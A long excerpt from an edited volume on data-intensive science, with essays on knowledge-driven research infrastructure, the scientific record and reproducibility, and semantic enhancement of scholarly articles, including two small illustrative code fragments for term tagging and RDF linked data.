The primary focus of the current technologies addresses only the first part of the data-information-knowledge-wisdom spectrum.8 Computers have become efficient at storing, managing, indexing, and computing (research) data. They are even able to represent and process some of the information hidden behind the symbols used to encode that data. Nevertheless, we are still a long way from having computer systems that can automatically discover, acquire, organize, analyze, correlate, interpret, infer, and reason over information thats on the Internet, thats hidden on researchers hard drives, or that exists only in our brains. We do not yet have an infrastructure capable of managing and processing knowledge on a global scale, one that can act as the foundation for a generation of knowledge-driven services and applications. So, if the fourth paradigm is about data and information, it is not unreasonable to foresee a future, not far away, where we begin thinking about the challenges of managing knowledge and machine-based understanding on a very large scale. We researchers will probably be the first to face this challenge. 166 SCIENTIFIC INFRASTRUCTURE The work by the Semantic Web9 community has resulted in a number of technologies to help with data modeling, information representation, and the interexchange of semantics, always within the context of a particular application domain. Given the formal foundations of some of these technologies (e.g., the Web Ontology Language, or OWL), it has been possible to introduce reasoning capabilities, at least for some specific bounded domains (e.g., BioMoby10). Moving forward, the work of the Semantic Web community will continue to play a significant role in the interoperable exchange of information and knowledge. More importantly, as representation technologies such as RDF (Resource Description Framework), OWL, and microformats become widely accepted, the focus will transition to the computational aspects of semantic understanding and knowledge. The challenge we will face is the automation of the aggregation and combination of huge amounts of semantically rich information and, very crucially, the processes by which that information is generated and analyzed. Today, we must start thinking about the technologies well need in order to semantically describe, analyze, and combine the information and the algorithms used to produce it or consume it, and to do so on a global scale. If todays cloud computing services focus on offering a scalable platform for computing, tomorrows services will be built around the management of knowledge and reasoning over it. We are already seeing some attempts to infer knowledge based on the worlds information. Services such as OpenCyc,11 Freebase,12 Powerset,13 True Knowledge,14 and Wolfram|Alpha15 demonstrate how facts can be recorded in such a way that they can be combined and made available as answers to a users questions. Wolfram|Alpha, in particular, has made use of domain experts to encode the computational aspects of processing the data and information that they have aggregated from around the Web and annotated. It demonstrates how a consumer-oriented service can be built on top of a computational infrastructure in combination with natural language processing. It is likely that many similar services will emerge in the near future, initially targeting specialized technical/academic communities 9 167 and later expanding to all domains of interest. 
As with other service-oriented applications on the Web, the incorporation of computational knowledge services for scientists will be an important aspect of any research cyberinfrastructure. The myGrid and myExperiment projects demonstrate the benefits of capturing and then sharing, in a semantically rich way, the definitions of workflows in science. Such workflows effectively document the process by which research-related information is produced and the steps taken toward reaching (or unsuccessfully trying to reach) a conclusion. Imagine the possibilities of expanding this idea to all aspects of our interaction with information. Today, for example, when someone enters "GDP of Brazil vs. Japan" as a query in Wolfram|Alpha, the engine knows how to interpret the input and produce a comparison graph of the GDP (gross domestic product) of the two countries. If the query is "Ford," the engine makes an assumption about its interpretation but also provides alternatives (e.g., "person" if the intended meaning might be Henry Ford or Gerald Rudolph Ford, Jr., vs. "business entity" if the intended meaning might be the Ford Motor Company). The context within which specific information is to be interpreted is important in determining what computational work will be performed. The same ideas could be implemented as part of a global research infrastructure, where Wolfram|Alpha could be one of the many available interoperable services that work together to support researchers.

The research community would indeed benefit greatly from a global infrastructure whose focus is on knowledge sharing and in which all applications and services are built with knowledge exchange and processing at their core. This is not to suggest that there should be yet another attempt to unify and centrally manage all knowledge representation. Scientists will always be better at representing and reasoning over their own domain. However, a research infrastructure should accommodate all domains and provide the necessary glue for information to be crosslinked, correlated, and discovered in a semantically rich manner. Such an infrastructure must provide the right set of services to not only allow access to semantically rich information but also expose computational services that operate on the world's knowledge. Researchers would be able to ask questions related to their domain of expertise, and a sea of knowledge would immediately be accessible to them. The processes of acquiring and sharing knowledge would be automated, and associated tools (e.g., a word processor that records an author's intended use of a term) would make it even easier to analyze, do research, and publish results. Natural language processing will aid in the interaction with the knowledge-based ecosystem of information, tools, and services, as shown in Figure 1.

Figure 1. High-level view of a research infrastructure that brings together knowledge bases and computational services.
Note that this proposed research infrastructure would not attempt to realize artificial intelligence (AI)despite the fact that many of the technologies from the Semantic Computing19 community (from data modeling and knowledge representation to natural language processing and reasoning) have emerged from work in 18 19 A distinction is assumed between the general approach of computing based on semantic technologies (machine learning, neural networks, ontologies, inference, etc.) and the Semantic Web as described in [5] and [6], which refers to a specific ecosystem of technologies, such as RDF and OWL. The Semantic Web technologies are considered to be just some of the many tools at our disposal when building semantics-based and knowledge-based solutions. 169 the AI field over the decades. The primary focus of the proposed cyberinfrastructure is automated knowledge management rather than intelligence. Mashing Up Knowledge Interdisciplinary research has gained a lot of momentum, especially as the result of eScience and cyberinfrastructure activities. Technology has played an enabling role by primarily supporting collaboration, sharing of information, and data management within the context of a research project. In the future, researchers should not have to think about how their questions, assumptions, theories, experiments, or data correlate with existing knowledge across disciplines in one scientific domain or even across domains. The process of combining information from existing scientific knowledge generated by different researchers at different times and in different locations, including the specific methodologies that were followed to produce conclusions, should be automatic and implicitly supported by the research infrastructure.20 For example, it should be trivial for a young Ph.D. researcher in chemistry to pose work items to a computer as natural language statements like Locate 100,000 molecules that are similar to the known HIV protease inhibitors, then compute their electronic properties and dock them into viral escape mutants. This illustrates the use of natural language processing and also the need for researchers to agree on vocabularies for capturing knowledgesomething already occurring in many scientific domains through the use of Semantic Web technologies. Furthermore, the example illustrates the need to be able to capture the computational aspects of how existing knowledge is processed and how new facts are generated. The research community has already started working on bringing the existing building blocks together to realize a future in which machines can further assist researchers in managing and processing knowledge. As an example, the oreChem21 project aims to automate the process by which chemistry-related knowledge captured in publications is extracted and represented in machine-processable formats, such as the Chemistry Markup Language (CML). Through the use of chemistryrelated ontologies, researchers will be able to declaratively describe the computations they would like to perform over the body of machine-processable knowledge. 20 21 Assuming that open access to research information has become a reality. 170 SCIENTIFIC INFRASTRUCTURE While projects such as oreChem do not attempt to realize a large-scale infrastructure for computable scientific knowledge, they do represent the first investigations toward such a vision. 
Going forward, the boundaries of domains will become less rigid so that cross-discipline knowledge (computational) mashups can become an important aspect of any semantics-enabled, knowledge-driven research infrastructure. The ability to cross-reference and cross-correlate information, facts, assumptions, and methodologies from different research domains on a global scale will be a great enabler for our future researchers.

A Call to Action

Today, platforms that offer implementations of the MapReduce computational pattern (e.g., Hadoop and Dryad) make it easy for developers to perform data-intensive computations at scale. In the future, it will be very important to develop equivalent platforms and patterns to support knowledge-related actions such as aggregation, acquisition, inference, reasoning, and information interpretation. We should aim to provide scientists with a cyberinfrastructure on top of which it should be easy to build a large-scale application capable of exploiting the world's computer-represented scientific knowledge. The interoperable exchange of information, whether representing facts or processes, is vital to successfully sharing knowledge. Communities need to come together, and many of them are already doing so, in order to agree on vocabularies for capturing facts and information specific to their domains of expertise. Research infrastructures of the future will create the necessary links across such vocabularies so that information can be interlinked as part of a global network of facts and processes, as per Tim Berners-Lee's vision for the Semantic Web. The future research infrastructures, which will be knowledge driven, will look more like Vannevar Bush's memex than today's data-driven computing machines. As Bush said, "Wholly new forms of encyclopedias will appear, ready made with a mesh of associative trails running through them, ready to be dropped into the memex and there amplified." [7] We are not far from that vision today.

Acknowledgments

The author would like to thank Peter Murray Rust (University of Cambridge) for his explanation of the oreChem project, Evelyne Viegas (Microsoft Research) for insightful discussions and great ideas over the years on all things related to Semantic Computing, and Tony Hey for his continuous support, encouragement, and trust.

References
[1] L. Dirks and T. Hey, The Coming Revolution in Scholarly Communications & Cyberinfrastructure, CT Watch Q., vol. 3, no. 3, 2007.
[2] National Science Foundation, Cyberinfrastructure Vision for 21st Century Discovery, March 2007.
[3] J. Taylor (n.d.), UK eScience Programme.
[4] J. Gray and A. Szalay, eScience - A Transformed Scientific Method, Presentation to the Computer Science and Technology Board of the National Research Council, Jan. 11, 2007. (Edited transcript in this volume.)
[5] T. Berners-Lee, J. A. Hendler, and O. Lassila, The Semantic Web, Scientific American, vol. 284, no. 5, pp. 35–43, May 2001.
[6] N. Shadbolt, W. Hall, and T. Berners-Lee, The Semantic Web Revisited, IEEE Intell. Syst., vol. 21, no. 3, pp. 96–101, 2006, doi: 10.1109/MIS.2006.62.
[7] V. Bush, As We May Think, The Atlantic, July 1945, doi: 10.3998/3336451.0001.101.

4. SCHOLARLY COMMUNICATION

Introduction

roadmap that outlines an ideal route to a vision he shared with Jim Gray of community-driven scientific knowledge curation and creation.
Van de Sompel and Lagoze stress that academics have yet to realize the full potential benefits of technology for scholarly communication. The authors make a crucial point that the hardest issues are social or dependent on humans, which means they cannot be easily resolved by new applications and additional silicon. They call for the development of open standards and interoperability protocols to help mitigate this situation.

The issues of sharing scientific data at an international level are addressed by Fitzgerald, Fitzgerald, and Pappalardo. Scientists sometimes encounter the greatest constraints at the national or regional level, which prevent them from participating in the global scientific endeavor. Citing a specific example, the authors appeal for coordination beyond the scientific community and recommend that policymakers work to avoid introducing impediments into the system.

Wilbanks puts a fine point on a common theme throughout this section: in many ways, scientists are often unwittingly responsible for holding back science. Even though, as professionals, we envision, instrument, and execute on innovative scientific endeavors, we do not always actually adopt or fully realize the systems we have put in place. As an amalgamated population of forward-thinking researchers, we often live behind the computational curve. He notes that it is crucial for connectivity to span all scientific fields and for multidisciplinary work and cooperation across domains, in turn, to fuel revolutionary advancements.

Hannay closes the section by highlighting the interconnectedness of our networked world despite lingering social barriers between various scientific fields. He notes that science's gradual shift from a cottage enterprise to a large-scale industry is part of the evolution of how we conduct science. He provides intriguing examples from around the world of research that can point a way to the future of Web-based communication, and he declares that we are living in an awkward age immediately prior to the advent of semantic reality and interconnectedness.

Research is evolving from small, autonomous scholarly guilds to larger, more enlightened, and more interconnected communities of scientists who are increasingly interdependent upon one another to move forward. In undertaking this great endeavor together, as Jim envisioned, we will see science, via computation, advance further and faster than ever before.

Jim Gray's Fourth Paradigm and the Construction of the Scientific Record

Jim Gray led the thinking of a group of scholars who saw the emergence of what they characterized as a fourth paradigm of scientific research. In this essay, I will focus narrowly on the implications of this fourth paradigm, which I will refer to as data-intensive science [1], for the nature of scientific communication and the scientific record. Gray's paradigm joins the classic pair of opposed but mutually supporting scientific paradigms: theory and experimentation. The third paradigm, that of large-scale computational simulation, emerged through the work of John von Neumann and others in the mid-20th century. In a certain sense, Gray's fourth paradigm provides an integrating framework that allows the first three to interact and reinforce each other, much like the traditional scientific cycle in which theory offered predictions that could be experimentally tested, and these experiments identified phenomena that required theoretical explanation.
The contributions of simulation to scientific progress, while enormous, fell short of their initial promise (for example, in long-term weather prediction) in part because of the extreme sensitivity of complex systems to initial conditions and chaotic behaviors [2]; this is one example in which simulation, theory, and experiment in the context of massive amounts of data must all work together.

To understand the effects of data-intensive science on the scientific record,1 it is first necessary to review the nature of that record, what it is intended to accomplish, and where it has and hasn't succeeded in meeting the needs of the various paradigms and the evolution of science.

1 For brevity and clearest focus, I've limited the discussion here to science. But just as it's clear that eScience is only a special case of eResearch and data-intensive science is a form of data-intensive scholarship, many of the points here should apply, with some adaptation, to the humanities and the social sciences.

To a first approximation, we can think of the modern scientific record, dating from the 17th century and closely tied to the rise of both science and scholarly societies, as comprising an aggregation of independent scientific journals and conference presentations and proceedings, plus the underlying data and other evidence to support the published findings. This record is stored in a highly distributed and, in some parts, highly redundant fashion across a range of libraries, archives, and museums around the globe. The data and evidentiary components have expanded over time: written observational records too voluminous to appear in journals have been stored in scientific archives, and physical evidence held in natural history museums is now joined by a vast array of digital datasets, databases, and data archives of various types, as well as pre-digital observational records (such as photographs) and new collections of biological materials. While scientific monographs and some specialized materials such as patents have long been a limited but important part of the record, gray literature, notably technical reports and preprints, has assumed greater importance in the 20th century. In recent years, we have seen an explosion of Web sites, blogs, video clips, and other materials (generally quite apart from the traditional publishing process) become a significant part of this record, although the boundaries of these materials and various problems related to their persistent identification, archiving and continued accessibility, vetting, and similar properties have been highly controversial.

The scientific record is intended to do a number of things. First and foremost, it is intended to communicate findings, hypotheses, and insights from one person to another, across space and across time. It is intended to organize: to establish common nomenclature and terminology, to connect related work, and to develop disciplines. It is a vehicle for building up communities and for a form of large-scale collaboration across space and time. It is a means of documenting, managing, and often, ultimately, resolving controversies and disagreements. It can be used to establish precedence for ideas and results, and also (through citation and bibliometrics) to offer evidence for the quality and significance of scientific work. The scientific record is intended to be trustworthy, in several senses.
In the small and in the near term, pre-publication peer review, editorial and authorial reputation, and transparency in reporting results are intended to ensure confidence in the correctness of individual articles. In the broader sense, across spans of time and aggregated collections of materials, findings are validated and errors or deliberate falsifications, particularly important ones, are usually identified and corrected by the community through post-publication discussion or formal review, reproduction, reuse and extension of results, and the placement of an individual publication's results in the broader context of scientific knowledge.

A very central idea that is related simultaneously to trustworthiness and to the ideas of collaboration and building upon the work of others is that of reproducibility of scientific results. While this is an ideal that has often been given only reluctant practical support by some scientists who are intent on protecting what they view as proprietary methods, data, or research leads, it is nonetheless what fundamentally distinguishes science from practices such as alchemy. The scientific record (not necessarily a single, self-contained article, but a collection of literature and data within the aggregate record, or, in today's terminology, an article and all of its implicit and explicit links) should make enough data available, and contain enough information about methods and practices, that another scientist could reproduce the same results starting from the same data. Indeed, he or she should be able to do additional work that helps to place the initial results in better context, to perturb assumptions and analytic methods, and to see where these changes lead. It is worth noting that the ideal of reproducibility for sophisticated experimental science often becomes problematic over long periods of time: reproducing experimental work may require a considerable amount of tacit knowledge that was part of common scientific practice and the technology base at the time the experiment was first carried out but that may be challenging and time-consuming to reproduce many decades later.

How well did the scientific record work during the long dominance of the first two scientific paradigms? In general, pretty well, I believe. The record (and the institutions that created, supported, and curated it) had to evolve in response to two major challenges. The first was mainly in regard to experimental science: as experiments became more complicated, sophisticated, and technologically mediated, and as data became more extensive and less comprehensively reproduced as part of scientific publications, the linkages between evidence and writings became more complex and elusive. In particular, as extended computation (especially mechanically or electromechanically assisted computation carried out by groups of human computers) was applied to data, difficulties in reproducibility began to extend far beyond access to data and understanding of methods. The affordances of a scholarly record based on print and physical artifacts offered little relief here; the best that could be done was to develop organized systems of data archives and set some expectations about data deposit or obligations to make data available. The second evolutionary challenge was the sheer scale of the scientific enterprise. The literature became huge; disciplines and sub-specialties branched and branched again.
Tools and practices had to be developed to help manage this scale: specialized journals, citations, indices, review journals and bibliographies, managed vocabularies, and taxonomies in various areas of science. Yet again, given the affordances of the print-based system, all of these innovations seemed to be too little too late, and scale remained a persistent and continually overwhelming problem for scientists.

The introduction of the third paradigm in the middle of the 20th century, along with the simultaneous growth in computational technologies supporting experimental and theoretical sciences, intensified the pressure on the traditional scientific record. Not only did the underlying data continue to grow, but the output of simulations and experiments became large and complex datasets that could only be summarized, rather than fully documented, in traditional publications. Worst of all, software-based computation for simulation and other purposes became an integral part of the question of experimental reproducibility.2 It's important to recognize how long it really took to reach the point when computer hardware was reasonably trustworthy in carrying out large-scale floating-point computations.3 (Even today, we are very limited in our ability to produce provably correct large-scale software; we rely on the slow growth of confidence through long and widespread use, preferably in a range of different hardware and platform environments. Documenting complex software configurations as part of the provenance of the products of data-intensive science remains a key research challenge in data curation and scientific workflow structuring.)

2 Actually, the ability to comprehend and reproduce extensive computations became a real issue for theoretical science as well; the 1976 proof of the four-color theorem in graph theory involved exhaustive computer analysis of a very large number of special cases and caused considerable controversy within the mathematical community about whether such a proof was really fully valid. A more recent example would be the proposed proof of the Kepler Conjecture by Thomas Hales.

3 The IEEE floating-point standard dates back to only 1985. I can personally recall incidents with major mainframe computers back in the 1970s and 1980s in which shipped products had to be revised in the field after significant errors were uncovered in their hardware and/or microcode that could produce incorrect computational results.

The better news was that computational technologies began to help with the management of the enormous and growing body of scientific literature as many of the organizational tools migrated to online databases and information retrieval systems starting in the 1970s and became ubiquitous and broadly affordable by the mid-1990s.

With the arrival of the data-intensive computing paradigm, the scientific record and the supporting system of communication and publication have reached a Janus moment where we are looking both backward and forward. It has become clear that data and software must be integral parts of the record: a set of first-class objects that require systematic management and curation in their own right. We see this reflected in the emphasis on data curation and reuse in the various cyberinfrastructure and eScience programs [3-6].
These datasets and other materials will be interwoven in a complex variety of ways [7] with scientific papers, now finally authored in digital form and beginning to make serious structural use of the new affordances of the digital environment, and at long last bidding a slow farewell to the initial model of electronic scientific journals, which applied digital storage and delivery technologies to articles that were essentially images of printed pages. We will also see tools such as video recordings used to supplement traditional descriptions of experimental methods, and the inclusion of various kinds of two- or three-dimensional visualizations. At some level, one can imagine this as the perfecting of the traditional scientific paper genre, with the capabilities of modern information technology meeting the needs of the four paradigms. The paper becomes a window for a scientist to not only actively understand a scientific result, but also reproduce it or extend it.

However, two other developments are taking hold with unprecedented scale and scope. The first is the development of reference data collections, often independent of specific scientific research even though a great deal of research depends on these collections and many papers make reference to data in these collections. Many of these are created by robotic instrumentation (synoptic sky surveys, large-scale sequencing of microbial populations, combinatorial chemistry); some also introduce human editorial and curatorial work to represent the best current state of knowledge about complex systems (the annotated genome of a given species, a collection of signaling pathways, etc.) and may cite results in the traditional scientific literature to justify or support assertions in the database. These reference collections are an integral part of the scientific record, of course, although we are still struggling with how best to manage issues such as versioning and the fixity of these resources. These data collections are used in very different ways than traditional papers; most often, they are computed upon rather than simply read. As these reference collections are updated, the updates may trigger new computations, the results of which may lead to new or reassessed scientific results. More and more, at least some kinds of contributions to these reference data collections will be recognized as significant scholarly contributions in their own right. One might think of this as scientists learning to more comprehensively understand the range of opportunities and idioms for contributing to the scholarly record in an era of data and computationally intensive science.

Finally, the scientific record itself is becoming a major object of ongoing computation, a central reference data collection, at least to the extent to which copyright and technical barriers can be overcome to permit this [8]. Data and text mining, inferencing, integration among structured data collections and papers written in human languages (perhaps augmented with semantic markup to help computationally identify references to particular kinds of objects, such as genes, stars, species, chemical compounds, or places, along with their associated properties, with a higher degree of accuracy than would be possible with heuristic textual analysis algorithms), information retrieval, filtering, and clustering all help to address the problems of the ever-growing scale of the scientific record and the ever-increasing scarcity of human attention.
They also help exploit the new technologies of data-intensive science to more effectively extract results and hypotheses from the record. We will see very interesting developments, I believe, as researchers use these tools to view the public record of science through the lens of various collections of proprietary knowledge (unreleased results, information held by industry for commercial advantage, or even government intelligence).

In the era of data-intensive computing, we are seeing people engage the scientific record in two ways. In the small, one or a few articles at a time, human beings read papers as they have for centuries, but with computational tools that allow them to move beyond the paper to engage the underlying science and data much more effectively and to move from paper to paper, or between paper and reference data collection, with great ease, precision, and flexibility. Further, these encounters will integrate with collaborative environments and with tools for annotation, authoring, simulation, and analysis. But now we are also seeing scholars engage the scientific record in the large, as a corpus of text and a collection of interlinked data resources, through the use of a wide range of new computational tools. This engagement will identify papers of interest; suggest hypotheses that might be tested through combinations of theoretical, experimental, and simulation investigations; or at times directly produce new data or results. As the balance of engagement in the large and in the small shifts (today, it is still predominantly in the small, I believe), we will see this change many aspects of scientific culture and scientific publishing practice, probably including views on open access to the scientific literature, the application of various kinds of markup and the choice of authoring tools for scientific papers, and disciplinary norms about data curation, data sharing, and overall data lifecycle. Further, I believe that in the practice of data-intensive science, one set of data will, over time, figure more prominently, persistently, and ubiquitously in scientific work: the scientific record itself.

Acknowledgments

My thanks to the participants at the April 24, 2009, Buckland-Lynch-Larsen Friday Seminar on information access at the University of California, Berkeley, School of Information for a very helpful discussion on a draft of this material.

References

[1] G. Bell, T. Hey, and A. Szalay, "Beyond the Data Deluge," Science, vol. 323, pp. 1297-1298, Mar. 6, 2009, doi: 10.1126/science.1170411.
[2] F. Dyson, "Birds and Frogs" (2008 Einstein lecture), Notices Am. Math. Soc., vol. 56, no. 2, pp. 212-224, Feb. 2009.
[3] National Science Board, Long-Lived Digital Data Collections: Enabling Research and Education in the 21st Century, National Science Foundation, 2005.
[4] Association of Research Libraries, To Stand the Test of Time: Long-term Stewardship of Digital Data Sets in Science and Engineering, Association of Research Libraries, 2006.
[5] Various reports available from the National Science Foundation Office of Cyberinfrastructure, including the Cyberinfrastructure Vision document and the Atkins report.
[6] L. Lyon, Dealing with Data: Roles, Rights, Responsibilities and Relationships (consultancy report), UKOLN and the Joint Information Systems Committee (JISC), 2006.
[7] C. A. Lynch, "The Shape of the Scientific Article in the Developing Cyberinfrastructure," CT Watch, vol. 3, no. 3, pp. 5-11, Aug. 2007.
[8] C. A. Lynch, "Open Computation: Beyond Human-Reader-Centric Views of Scholarly Literatures," in Neil Jacobs, Ed., Open Access: Key Strategic, Technical and Economic Aspects. Oxford: Chandos Publishing, 2006, pp. 185-193.

I first met Jim Gray when he was the moderator of the database subject area of arXiv, part of the expansion into computer science that arXiv initiated in 1998. Soon afterward, he was instrumental in facilitating the full-text harvest of arXiv by large-scale search engines, beginning with Google and followed by Microsoft and Yahoo!; previous robotic crawls of arXiv had been overly restricted in the 1990s due to their flooding of the servers with requests. Jim understood the increasing role of text as a form of data, and the need for text to be ingestible and treatable like any other computable object. In 2005, he was involved in both arXiv and PubMed Central and expressed to me his mystification that while the two repositories served similar roles, they seemed to operate in parallel universes, not connecting in any substantive way. His vision was of a world of scholarly resources (text, databases, and any other associated materials) that were seamlessly navigable and interoperable.

Many of the key open questions regarding the technological transformation of scholarly infrastructure were raised well over a decade ago, including the long-term financial model for implementing quality control, the architecture of the article of the future, and how all of the pieces will merge into an interoperable whole. While answers have remained elusive, there is reason to expect significant near-term progress on at least the latter two questions. In [1], I described how the range of possibilities for large and comprehensive full-text aggregations was just starting to be probed and offered the PubMed Central database as an exemplar of a forward-looking approach. Its full-text XML documents are parsed to permit multiple related material views for a given article, with links to genomic, nucleotide, inheritance, gene expression, protein, chemical, taxonomic, and other related databases. This methodology is now beginning to spread, along with more general forms of semantic enhancement: facilitating automated discovery and reasoning, providing links to related documents and data, providing access to actionable data within articles, and permitting integration of data between articles.

A recent example of semantic enhancement by a publisher is the Royal Society of Chemistry's journal Molecular BioSystems. Its enhanced HTML highlights terms in the text that are listed in chemical terminology databases and links them to the external database entries. Similarly, it highlights and links terms from gene, sequence, and cell ontologies. This textual markup is implemented by editors with subject-matter expertise, assisted by automated text-mining tools. An example of a fully automated tool for annotation of scientific terms is EMBL Germany's Reflect, which operates as an external service on any Web page or as a browser plug-in. It tags gene, protein, and small molecule names, and the tagged items are linked to the relevant sequence, structure, or interaction databases.
In a further thought experiment, Shotton et al. [2] marked up an article by hand using off-the-shelf technologies to demonstrate a variety of possible semantic enhancements, essentially a minimal set that would likely become commonplace in the near future. In addition to semantic markup of textual terms and live linkages of DOIs and other URLs where feasible, they implemented a reorderable reference list, a document summary including document statistics, a tag cloud of technical terms, tag trees of marked-up named entities grouped by semantic type, citation analysis (within each article), a Citations in Context tooltip indicating the type of citation (background, intellectual precedent, refutation, and so on), downloadable spreadsheets for tables and figures, interactive figures, and data fusion with results from other research articles and with contextual online maps. (See Figure 1.)

FIGURE 1. A screenshot of Exemplar Semantic Enhancements, as described in [2]. Different semantic classes of terms are linked and can be optionally highlighted using the buttons in the top row. Hovering the mouse pointer over an in-text reference citation displays a box containing key supporting statements or figures from the cited document.

They emphasize the future importance of domain-specific structured digital abstracts, namely, machine-readable metadata that summarize key data and conclusions of articles, including a list of named entities in the article with precise database identifiers, a list of the main results described via controlled vocabulary, and a description, using standard evidence codes, of the methodology employed. The use of controlled vocabularies in this structured summary will enable not only new metrics for article relatedness but also new forms of automated reasoning. Currently, recognition of named entities (e.g., gene names) in unstructured text is relatively straightforward, but reliable extraction of relationships expressed in conventional text is significantly more difficult. The next generation of automated knowledge extraction and processing tools, operating on structured abstracts and semantically enhanced text, will bring us that much closer to direct searching and browsing of knowledge, i.e., via synthesized concepts and their relationships. Further enhancements will include citation network analysis, automated image analysis, more generalized data mashups, and prekeyed or configurable algorithms that provide new types of semantic lenses through which to view the text, data, and images. All of these features can also be federated into hub environments where users can annotate articles and related information, discover hidden associations, and share new results.

In the near term, semantic text enhancement will be performed by a combination of semi-supervised tools used by authors,3 tools used by editors, and automated tools applied to both new and archival publications. Many legacy authors will be unwilling to spend time enhancing their documents, especially if much additional effort is required. Certainly many publishers will provide the markup as a value-added component of the publication process, i.e., as part of their financial model. The beneficial effects of this enhancement, visible to all readers, will create pressure in the open sector for equally powerful tools, perhaps after only a small time lag as each new feature is developed.

3 For example, Pablo Fernicola's Article Authoring Add-in for Microsoft Office Word 2007.
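As a rough sketch of the kind of term markup described above, the following fragment tags known terms in a sentence and links them to external database entries. It is a toy, dictionary-based tagger written for illustration only: the term list and the example.org URLs are placeholders, not the vocabularies or databases actually used by Molecular BioSystems, Reflect, or the Shotton et al. exemplar.

    import re

    # Illustrative only: a toy dictionary-based tagger. The terms and target
    # URLs below are placeholders, not real database entries.
    TERM_LINKS = {
        "caffeine": "https://example.org/chemical/caffeine",
        "CYP1A2": "https://example.org/gene/CYP1A2",
    }

    def tag_terms(text):
        """Wrap each known term in an HTML anchor pointing at its database entry."""
        pattern = re.compile(r"\b(" + "|".join(re.escape(t) for t in TERM_LINKS) + r")\b")
        return pattern.sub(
            lambda m: '<a href="%s">%s</a>' % (TERM_LINKS[m.group(1)], m.group(1)),
            text)

    print(tag_terms("Dietary caffeine is metabolized primarily by CYP1A2 in the liver."))

A production tool would draw its dictionary from curated ontologies and handle ambiguity and synonyms, but the output, terms wrapped in links to authoritative records, is the same in spirit as the enhanced HTML described above.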
It is more natural to incorporate the semantics from the outset rather than trying to layer it on afterwards, and in either case, PDF will not provide a convenient transport format. With the correct document format, tools, and incentives, authors may ultimately provide much of the structural and semantic metadata during the course of article writing, with marginal additional effort. In the longer term, there remains the question of where the semantic markup should be hosted, just as with other data published to the Web: Should publishers host datasets relevant to their own publications, or should there be independent SourceForge-like data repositories? And how should the markup be stored: as triplestores internal to the document or as external attachments specifying relationships and dependencies? As knowledge progresses, there will be new linkages, new things to annotate, and existing annotations that may lead to changed resources or data. Should it be possible to peel these back and view the document in the context of any previous time frame?

To avoid excessive one-off customization, the interactions between documents and data and the fusion of different data sources will require a generic, interoperable semantic layer over the databases. Such structures will also make the data more accessible to generic search engines, via keyword searches and natural-language queries. Having the data accessible in this way should encourage more database maintainers to provide local semantic interfaces, thereby increasing integration into the global data network and amplifying the community benefits of open access to text and data. Tim Berners-Lee has actively promoted the notion of linked data for all such purposes, not just by academics or for large and commonly used databases. Every user makes a small contribution to the overall structure by linking an object to a URI, which can be dereferenced to find links to more useful data. Such an articulated semantic structure facilitates simpler algorithms acting on World Wide Web text and data and is more feasible in the near term than building a layer of complex artificial intelligence to interpret free-form human ideas using some probabilistic approach.

New forms of interaction with the data layer are also embedded in discussions of Wolfram|Alpha,5 a new resource (made publicly available only after this writing) that uses substantial personnel resources to curate many thousands of data feeds into a format suitable for manipulation by a Mathematica algorithmic and visualization engine. Supplemented by a front end that interprets semi-natural-language queries, this system and its likely competition will dramatically raise user expectations for new forms of synthesized information that is available directly via generic search engines. These applications will develop that much more quickly over data repositories whose semantic layer is curated locally rather than requiring centralized curation.

5 Based on a private demonstration on April 23, 2009, and a public presentation on April 28, 2009.

Much of the recent progress in integrating data with text via semantic enhancement, as described above, has been with application to the life sciences literature.
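To make the linked data idea sketched above a little more concrete, the following fragment uses the Python rdflib library (assumed to be installed) to assert a few statements about an article and a gene, then queries them with SPARQL. The example.org URIs are placeholders; in real linked data they would dereference to further machine-readable descriptions.

    # Illustrative only: a handful of linked-data statements and a SPARQL query,
    # built with rdflib. The example.org URIs are placeholders.
    from rdflib import Graph, Literal, Namespace, URIRef
    from rdflib.namespace import RDF, RDFS

    EX = Namespace("http://example.org/")
    g = Graph()

    article = URIRef("http://example.org/article/42")
    gene = URIRef("http://example.org/gene/CYP1A2")

    g.add((article, RDF.type, EX.Article))
    g.add((article, EX.mentions, gene))
    g.add((gene, RDFS.label, Literal("CYP1A2")))

    # Which genes does the article mention? Predicates are spelled out in full
    # to keep the query self-contained.
    results = g.query("""
        SELECT ?label WHERE {
            <http://example.org/article/42> <http://example.org/mentions> ?g .
            ?g <http://www.w3.org/2000/01/rdf-schema#label> ?label .
        }
    """)
    for row in results:
        print(row[0])  # CYP1A2

The same statements could just as easily be published as Turtle or embedded as markup in an article; the essential point is that each object has a URI that other documents and databases can reuse and dereference.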
In principle, text mining and natural-language processing tools that recognize relevant entities and automatically link to domain-specific ontologies have natural analogs in all fields: for example, astronomical objects and experiments in astronomy; mathematical terms and theorems in mathematics; physical objects, terminology, and experiments in physics; and chemical structures and experiments in chemistry. While data-intensive science is certainly the norm in astrophysics, the pieces of the data network for astrophysics do not currently mesh nearly as well as in the life sciences. Most paradoxically, although the physics community was ahead in many of these digital developments going back to the early 1990s (including the development of the World Wide Web itself at CERN, a high-energy physics lab) and in providing open access to its literature, there is currently no coordinated effort to develop semantic structures for most areas of physics. One obstacle is that in many distributed fields of physics, such as condensed-matter physics, there are no dominant laboratories with prominent associated libraries to establish and maintain global resources.

In the biological and life sciences, it's also possible that text will decrease in value over the next decade compared with the semantic services that direct researchers to actionable data, help interpret information, and extract knowledge [3]. In most scientific fields, however, the result of research is more than an impartial set of database entries. The scientific article will retain its essential role of using carefully selected data to persuade readers of the truth of its authors' hypotheses. Database entries will serve a parallel role of providing access to complete and impartial datasets, both for further exploration and for automated data mining.

There are also important differences among areas of science in the role played by data. As one prominent physicist-turned-biologist commented to me recently, "There are no fundamental organizing principles in biology,"6 suggesting that some fields may always be intrinsically more data driven than theory driven. Science plays different roles within our popular and political culture and hence benefits from differing levels of support. In genomics, for example, we saw the early development of GenBank, its adoption as a government-run resource, and the consequent growth of related databases within the National Library of Medicine, all heavily used.

6 Wally Gilbert, dinner on April 27, 2009. His comment may have been intended in a more limited context than implied here.

It has also been suggested that massive data mining, and its attendant ability to tease out and predict trends, could ultimately replace more traditional components of the scientific method [4]. This viewpoint, however, confuses the goals of fundamental theory and phenomenological modeling. Science aims to produce far more than a simple mechanical prediction of correlations; instead, its goal is to employ those regularities extracted from data to construct a unified means of understanding them a priori. Predictivity of a theory is thus primarily crucial as a validator of its conceptual content, although it can, of course, have great practical utility as well. So we should neither overestimate the role of data nor underestimate that of text, and all scientists should track the semantic enhancement of text and related data-driven developments in the biological and life sciences with great interest and perhaps with envy.
